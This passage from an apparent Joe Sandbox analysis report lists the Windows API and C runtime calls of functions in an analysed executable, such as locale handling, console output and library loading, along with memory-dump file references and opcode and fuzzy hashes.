                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA4427
                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00AA4466
                                            • __alloca_probe_16.LIBCMT ref: 00AA4483
                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AA44C5
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00AA44E8
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                            • String ID:
                                            • API String ID: 2040435927-0
                                            • Opcode ID: 2c71df0f19ba96bf5e3c42fc45ce216ba6ab1cfccfd8bafac2dd811926d8aca7
                                            • Instruction ID: f04ae3bb6c00e8e4aa4183cee45a86db2b65322c8d1b2d496642cbacc3c7c39e
                                            • Opcode Fuzzy Hash: 2c71df0f19ba96bf5e3c42fc45ce216ba6ab1cfccfd8bafac2dd811926d8aca7
                                            • Instruction Fuzzy Hash: D1519072900216AFEF209FA4CC45FAB7BB9EF8A750F244525F9019B190E7B1CD11CB60
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00AA2093
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00AA209D
                                            • int.LIBCPMT ref: 00AA20B4
                                              • Part of subcall function 00AA25EC: std::_Lockit::_Lockit.LIBCPMT ref: 00AA25FD
                                              • Part of subcall function 00AA25EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA2617
                                            • codecvt.LIBCPMT ref: 00AA20D7
                                            • std::_Facet_Register.LIBCPMT ref: 00AA20EE
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA210E
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00AA211B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                            • String ID:
                                            • API String ID: 2133458128-0
                                            • Opcode ID: 55ea2e8da2db55acb5dc1fb2cdcb9b48e3f083d62d016d8593bc405d686a03cb
                                            • Instruction ID: df4ace630146dfbf8a9438b5a5a43788d12a2cfef8e5c6bdf732828aaed51ec9
                                            • Opcode Fuzzy Hash: 55ea2e8da2db55acb5dc1fb2cdcb9b48e3f083d62d016d8593bc405d686a03cb
                                            • Instruction Fuzzy Hash: 1901C0329001199BCF05EBA8CA517BE7766AF86310F254509F414AB2D1DF749E11CB91
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00AA2128
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00AA2132
                                            • int.LIBCPMT ref: 00AA2149
                                              • Part of subcall function 00AA25EC: std::_Lockit::_Lockit.LIBCPMT ref: 00AA25FD
                                              • Part of subcall function 00AA25EC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AA2617
                                            • ctype.LIBCPMT ref: 00AA216C
                                            • std::_Facet_Register.LIBCPMT ref: 00AA2183
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA21A3
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00AA21B0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                            • String ID:
                                            • API String ID: 2958136301-0
                                            • Opcode ID: af08c8e0d79fca4e195984c1a2543ec6eccb6b9ff81c80e59fd6a7835bb214f0
                                            • Instruction ID: 0c1ffd2d559a5fe2b58fb87435fdc760f3e1be33997e7bcf245e01ff82b4d1b2
                                            • Opcode Fuzzy Hash: af08c8e0d79fca4e195984c1a2543ec6eccb6b9ff81c80e59fd6a7835bb214f0
                                            • Instruction Fuzzy Hash: 0601F1329001199FCF05EBA8DA017BEBBB9BF86720F244509F514AB3D2DF749E048B90
                                            APIs
                                            • GetLastError.KERNEL32(?,?,00AA7911,00AA5ABF,00AA4FD2), ref: 00AA7928
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AA7936
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AA794F
                                            • SetLastError.KERNEL32(00000000,00AA7911,00AA5ABF,00AA4FD2), ref: 00AA79A1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 4a468f714e618902e8e42faa578700573e9183f70857e5226d49e785aa2300ae
                                            • Instruction ID: 77950e23561ac29d1473527c9cec7a94e1706c9268529df3ae05959ec64c5241
                                            • Opcode Fuzzy Hash: 4a468f714e618902e8e42faa578700573e9183f70857e5226d49e785aa2300ae
                                            • Instruction Fuzzy Hash: 0901DF3220D2126EA66627B8BD85E2F2B95EB13370B20032FF115970F1FF124C0296A9
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5E2ACE94,?,?,00000000,00ABB1C6,000000FF,?,00AAC17F,?,?,00AAC153,00000016), ref: 00AAC224
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AAC236
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00ABB1C6,000000FF,?,00AAC17F,?,?,00AAC153,00000016), ref: 00AAC258
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: d99b5cafa6c7e38ff09e3ef008034146f62479c59952aa6410b25934bc151ea6
                                            • Instruction ID: 82a1d61d0694fc9757274e5329f58b5464bdb47f90399412bc8b4c5284666e3e
                                            • Opcode Fuzzy Hash: d99b5cafa6c7e38ff09e3ef008034146f62479c59952aa6410b25934bc151ea6
                                            • Instruction Fuzzy Hash: 32016731914619BFDB119F94DC05FEEBBBCFB44B14F040625F812A22E1EB759901CA50
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00AA3C92
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00AA3C9D
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA3D0B
                                              • Part of subcall function 00AA3DEE: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AA3E06
                                            • std::locale::_Setgloballocale.LIBCPMT ref: 00AA3CB8
                                            • _Yarn.LIBCPMT ref: 00AA3CCE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                            • String ID:
                                            • API String ID: 1088826258-0
                                            • Opcode ID: fbfe303f8ac8804ba36ddad44fb70772be5b920e28c8e69faa0f1708e248ca4f
                                            • Instruction ID: 118e11263586d10c73391f0729546b954b855a9a6bb8f7c2669b44288c5fdc49
                                            • Opcode Fuzzy Hash: fbfe303f8ac8804ba36ddad44fb70772be5b920e28c8e69faa0f1708e248ca4f
                                            • Instruction Fuzzy Hash: 74018F76A002109BCB06EB60D9416BD7B66BFD6740B188019F8126B3D2DF74AF06CF95
                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 00AA2331
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00AA233E
                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA237B
                                              • Part of subcall function 00AA3D89: _Yarn.LIBCPMT ref: 00AA3DA8
                                              • Part of subcall function 00AA3D89: _Yarn.LIBCPMT ref: 00AA3DCC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                            • String ID: bad locale name
                                            • API String ID: 482894088-1405518554
                                            • Opcode ID: 90de518ff74638c3daa5f1f2b48b9cd8dc2c632d7bbeaa3a82a2813f3883bd6f
                                            • Instruction ID: 9ecca9e46db7b1b16d21eccc0df7f261207a03365ed3bdc233949a2ee32e2edb
                                            • Opcode Fuzzy Hash: 90de518ff74638c3daa5f1f2b48b9cd8dc2c632d7bbeaa3a82a2813f3883bd6f
                                            • Instruction Fuzzy Hash: 160180729057949EC7309FAA954158AFFE4BF1A350B408A6FF18DC7A42D770E600CBA9
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AA8A13,00000000,?,00B149FC,?,?,?,00AA8BB6,00000004,InitializeCriticalSectionEx,00ABEB88,InitializeCriticalSectionEx), ref: 00AA8A6F
                                            • GetLastError.KERNEL32(?,00AA8A13,00000000,?,00B149FC,?,?,?,00AA8BB6,00000004,InitializeCriticalSectionEx,00ABEB88,InitializeCriticalSectionEx,00000000,?,00AA896D), ref: 00AA8A79
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AA8AA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 3d55f276ba5297adbc75325dea75c1670b879ea4deffc94688715781f56df65a
                                            • Instruction ID: a2d88afb3200cf46e5fd200a9e0fb3b983d1ae9a898bd4e6e1eaabd0aac52780
                                            • Opcode Fuzzy Hash: 3d55f276ba5297adbc75325dea75c1670b879ea4deffc94688715781f56df65a
                                            • Instruction Fuzzy Hash: 7EE04831340208BBFF107BA0DC06B593F55AB01B80F548031F90DE94F2EB6598528584
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(5E2ACE94,00000000,00000000,00000000), ref: 00AAFCA1
                                              • Part of subcall function 00AB3CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AB2C36,?,00000000,-00000008), ref: 00AB3D50
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AAFEFC
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00AAFF44
                                            • GetLastError.KERNEL32 ref: 00AAFFE7
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: 1dc31e266ae97afeebbd84917147a83037382669d1d5a28f898229903858bcfb
                                            • Instruction ID: 7a9ed29771a9ca79eaf277c8b278e84a7303a56bb41d0c3ab7884f0049790dc1
                                            • Opcode Fuzzy Hash: 1dc31e266ae97afeebbd84917147a83037382669d1d5a28f898229903858bcfb
                                            • Instruction Fuzzy Hash: 62D14875D042589FCB19CFE8D8809EDBBB5FF4A304F18412AE855EB296E730A942CB50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 01467bae1f6aab5c0afa71c40227f974f11deb51e46861acb501db56ac373f54
                                            • Instruction ID: 879ac03559f582e99ed35afce28f5b510690a47e7aada1a5cfa974b87946411c
                                            • Opcode Fuzzy Hash: 01467bae1f6aab5c0afa71c40227f974f11deb51e46861acb501db56ac373f54
                                            • Instruction Fuzzy Hash: 3851E0B2A08602AFDB299F14CD41BBFB7A4EF42311F14452DE916972D1E735ED80CBA0
                                            APIs
                                              • Part of subcall function 00AB3CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AB2C36,?,00000000,-00000008), ref: 00AB3D50
                                            • GetLastError.KERNEL32 ref: 00AB4124
                                            • __dosmaperr.LIBCMT ref: 00AB412B
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00AB4165
                                            • __dosmaperr.LIBCMT ref: 00AB416C
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: c613b3e516e75025173ec31028db7343c83d790b2bc2b9c8e4826ffbb43e803e
                                            • Instruction ID: 47977b7b98532f6a0a9c1d4b1a0e01bda4452632896d3569e2ec43311ea0add0
                                            • Opcode Fuzzy Hash: c613b3e516e75025173ec31028db7343c83d790b2bc2b9c8e4826ffbb43e803e
                                            • Instruction Fuzzy Hash: 6721D731A00205BFDB20AF69DD91DBABBADFF59364B108628F915D7253D731EC418BA0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bdd22ce0f69f7d44b68d8eb572c931a2f18dd849f4a46b0d50ece161f5c407a3
                                            • Instruction ID: b91898e06d0031fe2ad5281d3074454b8653c6ee8e287c82e520e19dc14eac43
                                            • Opcode Fuzzy Hash: bdd22ce0f69f7d44b68d8eb572c931a2f18dd849f4a46b0d50ece161f5c407a3
                                            • Instruction Fuzzy Hash: E7219331620205AFDB20AFA1CD9197ABBADFF4A364B108629F915D76D3E731EC418770
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 00AB505E
                                              • Part of subcall function 00AB3CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00AB2C36,?,00000000,-00000008), ref: 00AB3D50
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AB5096
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AB50B6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 6e6a73f46e873982335c87e6a9b10c926d717d30f90f77ee750f6f74e40f6947
                                            • Instruction ID: ea80659db0b17e616d1129242893f8a967e84b91efa2989cc22c56ca7aa02a32
                                            • Opcode Fuzzy Hash: 6e6a73f46e873982335c87e6a9b10c926d717d30f90f77ee750f6f74e40f6947
                                            • Instruction Fuzzy Hash: 6611C4B2901A567FAA2177B5AD89EFF69ACDE8A3947500224F901E2103FF25CE0145B1
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00AB8281,00000000,00000001,00000000,00000000,?,00AB003B,00000000,00000000,00000000), ref: 00AB949C
                                            • GetLastError.KERNEL32(?,00AB8281,00000000,00000001,00000000,00000000,?,00AB003B,00000000,00000000,00000000,00000000,00000000,?,00AB05C2,00000000), ref: 00AB94A8
                                              • Part of subcall function 00AB946E: CloseHandle.KERNEL32(FFFFFFFE,00AB94B8,?,00AB8281,00000000,00000001,00000000,00000000,?,00AB003B,00000000,00000000,00000000,00000000,00000000), ref: 00AB947E
                                            • ___initconout.LIBCMT ref: 00AB94B8
                                              • Part of subcall function 00AB9430: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00AB945F,00AB826E,00000000,?,00AB003B,00000000,00000000,00000000,00000000), ref: 00AB9443
                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00AB8281,00000000,00000001,00000000,00000000,?,00AB003B,00000000,00000000,00000000,00000000), ref: 00AB94CD
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: a3c0048c34d91705fa1c88272a98b274d5bdef5850b19023d3e7fe4aef948c53
                                            • Instruction ID: b14778107fba12c0fbf152633f6d77ff9a1f4b2632d6cd64e9bd42148ed2d826
                                            • Opcode Fuzzy Hash: a3c0048c34d91705fa1c88272a98b274d5bdef5850b19023d3e7fe4aef948c53
                                            • Instruction Fuzzy Hash: 93F0F836400154BBCF226FD5AC04A8E3F2AFB083B1F014110FA1995132DA3289229B90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: H_prolog3_catch_strlen
                                            • String ID: Madino Mino
                                            • API String ID: 3133806014-1963490786
                                            • Opcode ID: 0c8549529f71cdc4c2be089b4b7bc9e91d29b292ac59acb1aad21334341ce95c
                                            • Instruction ID: 8bd1c9be60840424ae295d7dfa2260f57d1eb6206408c8b6b9bc38ef114634d3
                                            • Opcode Fuzzy Hash: 0c8549529f71cdc4c2be089b4b7bc9e91d29b292ac59acb1aad21334341ce95c
                                            • Instruction Fuzzy Hash: 8E419175A00214AFCB10DFA8E9819ACB7F1BF4E760F69426AE0349B3D2C7759C41CB54
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00AA775F
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00AA7813
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290889031.0000000000ABD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                            • Associated: 0000000B.00000002.2290947454.0000000000B16000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_aa0000_J9jGBSSbDD3yrTx79DzmOLls.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 167ceb9d0b4a39bfbd3dc87120fb23a548a83a65f53577dd6de8c8218cadbe15
                                            • Instruction ID: 63fb56b7d2fc65275472ee0ed2ec81e5b76c8e09a988bee235555f4052a89a98
                                            • Opcode Fuzzy Hash: 167ceb9d0b4a39bfbd3dc87120fb23a548a83a65f53577dd6de8c8218cadbe15
                                            • Instruction Fuzzy Hash: E541A234E04218ABCF10DF68CC84AAFBBB5BF46324F148195E8159B3D2DB35D901CB91
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 00AA8052
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2290862399.0000000000AA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AA0000, based on PE: true
                                            • Associated: 0000000B.00000002.2290839895.0000000000AA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
